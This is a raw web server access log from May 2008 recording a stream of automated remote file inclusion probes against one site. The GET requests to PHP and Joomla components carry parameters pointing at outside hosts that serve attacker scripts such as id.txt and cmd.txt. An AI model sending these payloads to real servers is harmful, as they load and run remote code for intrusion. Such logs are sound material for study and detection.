216.227.209.138 - - [28/May/2008:09:56:58 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:09:56:59 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:09:57:06 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:09:57:19 -0700] "GET /logs/access_071212.log/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:09:57:20 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:09:57:20 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:09:57:28 -0700] "GET /logs/access_080102.log/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:57:34 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:57:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:57:58 -0700] "GET /logs/index.php?file=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:58:01 -0700] "GET /index.php?file=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:58:03 -0700] "GET /logs/access_080327.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:09:58:06 -0700] "GET //index.php?option=com_custompages&cpage=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:58:06 -0700] "GET /logs/access_080124.log//modules/My_eGallery/index.php?include_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:58:06 -0700] "GET /logs/access_080118.log//modules/My_eGallery/index.php?include_path=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:58:34 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.53.8.217 - - [28/May/2008:09:58:34 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.aula-verde.com.ar/cache/.no_deleted.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:09:58:48 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:09:58:48 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.9.36.146 - - [28/May/2008:09:58:50 -0700] "GET /logs//modules/My_eGallery/index.php?include_path=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.9.36.146 - - [28/May/2008:09:58:50 -0700] "GET //modules/My_eGallery/index.php?include_path=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:09:58:53 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:09:58:53 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:59:06 -0700] "GET /logs/access_080327.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:09:59:47 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:09:59:47 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:09:59:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:09:59:49 -0700] "GET /logs/access_080326.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:09:59:52 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:09:59:57 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:10:00:00 -0700] "GET /logs//modules/My_eGallery/index.php?include_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:10:00:00 -0700] "GET //modules/My_eGallery/index.php?include_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:00:09 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:10:00:37 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:10:01:08 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:10:01:41 -0700] "GET /logs/access_071224.log//tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:10:01:42 -0700] "GET //tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:10:01:42 -0700] "GET /logs//tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:10:01:49 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:10:01:55 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:02:23 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:02:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:02:24 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:02:26 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:02:26 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:02:27 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:03:24 -0700] "GET /logs/access_080308.log/photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.251.172 - - [28/May/2008:10:03:24 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:03:28 -0700] "GET /logs/access_080218.log/photo/update/update5.php?lang=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:03:35 -0700] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:03:36 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:03:37 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:03:37 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:03:43 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:03:46 -0700] "GET /logs/access_080327.log//claroline/phpbb/page_tail.php?includePath=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:03:53 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:10:04:22 -0700] "GET /logs/access_071212.log/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:10:04:27 -0700] "GET /logs/access_080102.log/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:10:04:30 -0700] "GET /logs/access_071230.log//tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:04:45 -0700] "GET /logs/access_071223.log/index.php?p=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:04:45 -0700] "GET /logs/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:04:46 -0700] "GET /admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:04:49 -0700] "GET /index.php?p=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:04:54 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:04:54 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:04:58 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:04:59 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:04:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:05:03 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:05:03 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:05:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:05:31 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:05:31 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:05:52 -0700] "GET /logs/admin.php?include_path=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:05:52 -0700] "GET /admin.php?include_path=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.3.183 - - [28/May/2008:10:06:10 -0700] "GET /display.php?page=&lang=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [28/May/2008:10:06:11 -0700] "GET /display.php?page=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:07:22 -0700] "GET /logs/admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:07:22 -0700] "GET /admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:07:23 -0700] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:07:29 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:07:48 -0700] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:07:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:07:53 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.80.187 - - [28/May/2008:10:07:57 -0700] "GET /application.php?base_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:07:58 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:08:26 -0700] "GET /logs/access_080327.log//faqsupport/samplefaqsupport.php?path[docroot]=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:09:15 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:10:09:15 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:10:09:24 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://h1.ripway.com/bobbyku/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:10:09:24 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://h1.ripway.com/bobbyku/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:10:09:25 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:10:09:26 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:09:26 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:09:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:09:42 -0700] "GET /logs/access_080327.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:10:09:42 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:10:09:42 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.240.231.154 - - [28/May/2008:10:09:47 -0700] "GET /logs/main.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [28/May/2008:10:09:52 -0700] "GET /main.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:10:10:26 -0700] "GET /logs//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:10:10:34 -0700] "GET //nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:11:18 -0700] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.9.248 - - [28/May/2008:10:11:47 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:13:09 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:13:09 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:10:13:10 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:13:31 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:13:31 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:13:31 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:10:14:03 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.217.32 - - [28/May/2008:10:14:41 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
